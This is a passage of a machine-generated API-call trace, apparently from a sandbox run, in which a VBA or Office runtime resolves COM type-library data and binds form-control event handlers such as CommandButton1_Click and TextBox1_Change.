ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x52) returned 0x0 [0041.987] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.987] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.987] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.987] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.987] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.987] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.987] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.987] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.987] IUnknown:AddRef (This=0x6cef280) returned 0x6 [0041.987] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.987] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.987] IUnknown:Release (This=0x6cef280) returned 0x5 [0041.987] strcpy_s (in: _Dst=0x6cac080, _DstSize=0xf, _Src="CommandButton2" | out: _Dst="CommandButton2") returned 0x0 [0041.987] IMalloc:Alloc (This=0x7feffc15380, cb=0xc8) returned 0x6c2d7e0 [0041.988] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x1834c0, pDummy=0x6cef280 | out: ppTypeAttr=0x1834c0, pDummy=0x6cef280*=0xffe207b0) returned 0x0 [0041.988] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6cef280, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x52) returned 0x0 [0041.988] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.988] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.988] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.988] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.988] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.988] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.988] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.988] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.988] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.988] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.988] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.988] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.988] strcpy_s (in: _Dst=0x6cac098, _DstSize=0xa, _Src="ValidText" | out: _Dst="ValidText") returned 0x0 [0041.988] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0d820 [0041.988] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1834c0, pDummy=0x6ceefc0 | out: ppTypeAttr=0x1834c0, pDummy=0x6ceefc0*=0xffe207b0) returned 0x0 [0041.988] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ceefc0, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x54) returned 0x0 [0041.988] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.988] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.988] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.988] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.988] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.988] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.988] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x11, _Src=0x38a2bee | out: _Dst=0x1830f0) returned 0x0 [0041.989] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1") returned 0x1097ee [0041.989] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x11, _Src=0x1830fa | out: _Dst=0x1830f0) returned 0x0 [0041.989] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.989] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.989] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.989] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x11, _Src=0x38a2bee | out: _Dst=0x1830b0) returned 0x0 [0041.989] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1") returned 0x1097ee [0041.989] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x11, _Src=0x1830ba | out: _Dst=0x1830b0) returned 0x0 [0041.989] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.989] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b87f20 [0041.989] strcpy_s (in: _Dst=0x6cac0b0, _DstSize=0x11, _Src="EditText1_Change" | out: _Dst="EditText1_Change") returned 0x0 [0041.989] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.989] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.989] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.989] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.989] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cac420 [0041.989] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x15, _Src=0x38a2c4a | out: _Dst=0x1830f0) returned 0x0 [0041.989] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton1") returned 0x10d47c [0041.989] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x15, _Src=0x1830ff | out: _Dst=0x1830f0) returned 0x0 [0041.989] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Click") returned 0x10e38a [0041.989] IUnknown:Release (This=0x6cef280) returned 0x5 [0041.989] IUnknown:AddRef (This=0x6cef280) returned 0x6 [0041.989] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x15, _Src=0x38a2c4a | out: _Dst=0x1830b0) returned 0x0 [0041.990] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton1") returned 0x10d47c [0041.990] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x15, _Src=0x1830bf | out: _Dst=0x1830b0) returned 0x0 [0041.990] IUnknown:Release (This=0x6cef280) returned 0x5 [0041.990] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b87f70 [0041.990] strcpy_s (in: _Dst=0x6cac0d0, _DstSize=0x15, _Src="CommandButton1_Click" | out: _Dst="CommandButton1_Click") returned 0x0 [0041.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.990] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.990] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.990] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.990] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x11, _Src=0x38a2c82 | out: _Dst=0x1830f0) returned 0x0 [0041.990] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.991] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x11, _Src=0x1830fa | out: _Dst=0x1830f0) returned 0x0 [0041.991] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.991] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.991] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.991] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x11, _Src=0x38a2c82 | out: _Dst=0x1830b0) returned 0x0 [0041.991] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.991] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x11, _Src=0x1830ba | out: _Dst=0x1830b0) returned 0x0 [0041.991] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.991] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b87fc0 [0041.991] strcpy_s (in: _Dst=0x6cac0f0, _DstSize=0x11, _Src="ValidText_Change" | out: _Dst="ValidText_Change") returned 0x0 [0041.991] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cac670 [0041.991] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.991] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.991] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.991] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.991] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x15, _Src=0x38a2d82 | out: _Dst=0x1830f0) returned 0x0 [0041.991] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton2") returned 0x10d47d [0041.991] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x15, _Src=0x1830ff | out: _Dst=0x1830f0) returned 0x0 [0041.991] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Click") returned 0x10e38a [0041.991] IUnknown:Release (This=0x6cef280) returned 0x5 [0041.991] IUnknown:AddRef (This=0x6cef280) returned 0x6 [0041.991] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x15, _Src=0x38a2d82 | out: _Dst=0x1830b0) returned 0x0 [0041.991] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton2") returned 0x10d47d [0041.991] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x15, _Src=0x1830bf | out: _Dst=0x1830b0) returned 0x0 [0041.991] IUnknown:Release (This=0x6cef280) returned 0x5 [0041.992] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b88010 [0041.992] strcpy_s (in: _Dst=0x6cac110, _DstSize=0x15, _Src="CommandButton2_Click" | out: _Dst="CommandButton2_Click") returned 0x0 [0041.992] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.992] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.992] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cac8c0 [0041.992] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.992] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.992] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x10, _Src=0x38a2dba | out: _Dst=0x1830f0) returned 0x0 [0041.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1") returned 0x1053a6 [0041.992] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x10, _Src=0x1830f9 | out: _Dst=0x1830f0) returned 0x0 [0041.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.992] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.992] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.992] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x10, _Src=0x38a2dba | out: _Dst=0x1830b0) returned 0x0 [0041.992] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1") returned 0x1053a6 [0041.992] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x10, _Src=0x1830b9 | out: _Dst=0x1830b0) returned 0x0 [0041.992] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.992] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b88060 [0041.992] strcpy_s (in: _Dst=0x6cac130, _DstSize=0x10, _Src="TextBox1_Change" | out: _Dst="TextBox1_Change") returned 0x0 [0041.992] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.992] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.992] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.992] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.992] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cacb10 [0041.992] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x11, _Src=0x38a2e66 | out: _Dst=0x1830f0) returned 0x0 [0041.993] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ComboBox1") returned 0x10d827 [0041.993] _mbscpy_s (in: _Dst=0x1830f0, _DstSizeInBytes=0x11, _Src=0x1830fa | out: _Dst=0x1830f0) returned 0x0 [0041.993] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.993] IUnknown:Release (This=0x6cef120) returned 0x4 [0041.993] IUnknown:AddRef (This=0x6cef120) returned 0x5 [0041.993] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x11, _Src=0x38a2e66 | out: _Dst=0x1830b0) returned 0x0 [0041.993] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ComboBox1") returned 0x10d827 [0041.993] _mbscpy_s (in: _Dst=0x1830b0, _DstSizeInBytes=0x11, _Src=0x1830ba | out: _Dst=0x1830b0) returned 0x0 [0041.993] IUnknown:Release (This=0x6cef120) returned 0x4 [0041.993] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b880b0 [0041.993] strcpy_s (in: _Dst=0x6cac148, _DstSize=0x11, _Src="ComboBox1_Change" | out: _Dst="ComboBox1_Change") returned 0x0 [0041.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.993] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.993] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.993] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x10) returned 0x6c32970 [0041.993] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c7d840, cb=0xe0) returned 0x6c0d910 [0041.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505033a, cbMultiByte=9, lpWideCharStr=0x184b70, cchWideChar=10 | out: lpWideCharStr="TextBox1") returned 9 [0041.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TextBox1", cchWideChar=-1, lpMultiByteStr=0x184a80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextBox1", lpUsedDefaultChar=0x0) returned 9 [0041.993] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a6e948, index=0xffffffff, pRefType=0x184b80 | out: pRefType=0x184b80*=0xfffffffe) returned 0x0 [0041.993] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0xfffffffe, ppTInfo=0x184c58 | out: ppTInfo=0x184c58*=0x6a6e8e8) returned 0x0 [0041.994] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184bf8 | out: ppvObject=0x184bf8*=0x0) returned 0x80004002 [0041.994] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184c00 | out: ppvObject=0x184c00*=0x0) returned 0x80004002 [0041.994] ITypeInfo:GetTypeComp (in: This=0x6a6e8e8, ppTComp=0x184c08 | out: ppTComp=0x184c08*=0x6a6e8f0) returned 0x0 [0041.994] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x68804b0 [0041.994] IUnknown:AddRef (This=0x6a6e8f0) returned 0x7 [0041.994] IUnknown:Release (This=0x6a6e8f0) returned 0x6 [0041.994] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c0d910, cb=0xf0) returned 0x6c1ebb0 [0041.994] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0041.994] IUnknown:Release (This=0x6a6e948) returned 0x4 [0041.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505033a, cbMultiByte=9, lpWideCharStr=0x184b70, cchWideChar=10 | out: lpWideCharStr="TextBox1") returned 9 [0041.994] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="TextBox1", lHashVal=0x1053a6, wFlags=0x5, ppTInfo=0x184b28, pDescKind=0x184b3c, ppFuncDesc=0x184b40, ppVarDesc=0x7feffa43907, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x184b28*=0x0, pDescKind=0x184b3c*=0, ppFuncDesc=0x184b40, ppVarDesc=0x7feffa43907, ppTypeComp=0x0, pDummy=0x0) returned 0x80028ca0 [0041.995] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a6e948, index=0xffffffff, pRefType=0x184880 | out: pRefType=0x184880*=0xfffffffe) returned 0x0 [0041.995] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0xfffffffe, ppTInfo=0x184958 | out: ppTInfo=0x184958*=0x6a6e8e8) returned 0x0 [0041.995] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0041.995] IUnknown:Release (This=0x6a6e948) returned 0x4 [0041.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505033a, cbMultiByte=9, lpWideCharStr=0x184870, cchWideChar=10 | out: lpWideCharStr="TextBox1") returned 9 [0041.995] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="TextBox1", lHashVal=0x1053a6, wFlags=0x3, ppTInfo=0x184828, pDescKind=0x18483c, ppFuncDesc=0x184840, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x184828*=0x6a6e8e8, pDescKind=0x18483c*=1, ppFuncDesc=0x184840, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.995] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184830, pDummy=0x1 | out: ppTypeAttr=0x184830, pDummy=0x1) returned 0x0 [0041.995] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.995] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e8e8, hreftype=0x25, ppTInfo=0x1840e8 | out: ppTInfo=0x1840e8*=0x6ceee08) returned 0x0 [0041.995] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842b8 | out: ppvObject=0x1842b8*=0x0) returned 0x80004002 [0041.995] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x184138, pDummy=0x10 | out: ppTypeAttr=0x184138, pDummy=0x10) returned 0x0 [0041.995] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.995] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c14010, cb=0x20) returned 0x68ea030 [0041.995] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fb0, cb=0x28) returned 0x68ea060 [0041.995] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183e40 | out: ppvObject=0x183e40*=0x0) returned 0x80004002 [0041.995] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183e30 | out: ppvObject=0x183e30*=0x0) returned 0x80004002 [0041.995] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183e38 | out: ppvObject=0x183e38*=0x0) returned 0x80004002 [0041.995] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x183e68, pDummy=0x10 | out: ppTypeAttr=0x183e68, pDummy=0x10) returned 0x0 [0041.995] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.996] IUnknown:AddRef (This=0x6ceee08) returned 0x3 [0041.996] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183fe0 | out: ppvObject=0x183fe0*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183fd8 | out: ppvObject=0x183fd8*=0x0) returned 0x80004002 [0041.996] IUnknown:Release (This=0x6ceee08) returned 0x2 [0041.996] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1845e0, pDummy=0x0 | out: ppTypeAttr=0x1845e0, pDummy=0x0) returned 0x0 [0041.996] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184690 | out: ppvObject=0x184690*=0x6a6e8e8) returned 0x0 [0041.996] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6a6e8e8, memid=2003, invkind=2, pFuncIndex=0x1846d0 | out: pFuncIndex=0x1846d0*=0x1) returned 0x0 [0041.996] ITypeInfo2:GetFuncCustData (in: This=0x6a6e8e8, index=0x1, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1846e8 | out: pVarVal=0x1846e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x184790, varVal2=0x6b7edd8)) returned 0x0 [0041.996] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0041.996] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184648 | out: ppvObject=0x184648*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184520 | out: ppvObject=0x184520*=0x0) returned 0x80004002 [0041.996] IUnknown:Release (This=0x6ceee08) returned 0x2 [0041.996] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184648 | out: ppvObject=0x184648*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184520 | out: ppvObject=0x184520*=0x0) returned 0x80004002 [0041.996] IUnknown:Release (This=0x6ceee08) returned 0x2 [0041.996] IUnknown:AddRef (This=0x6a6e8e8) returned 0x6 [0041.996] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e8e8) returned 0x0 [0041.996] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1849a8 | out: ppvObject=0x1849a8*=0x0) returned 0x80004002 [0041.996] IUnknown:AddRef (This=0x6a6e8e8) returned 0x6 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184920 | out: ppvObject=0x184920*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: 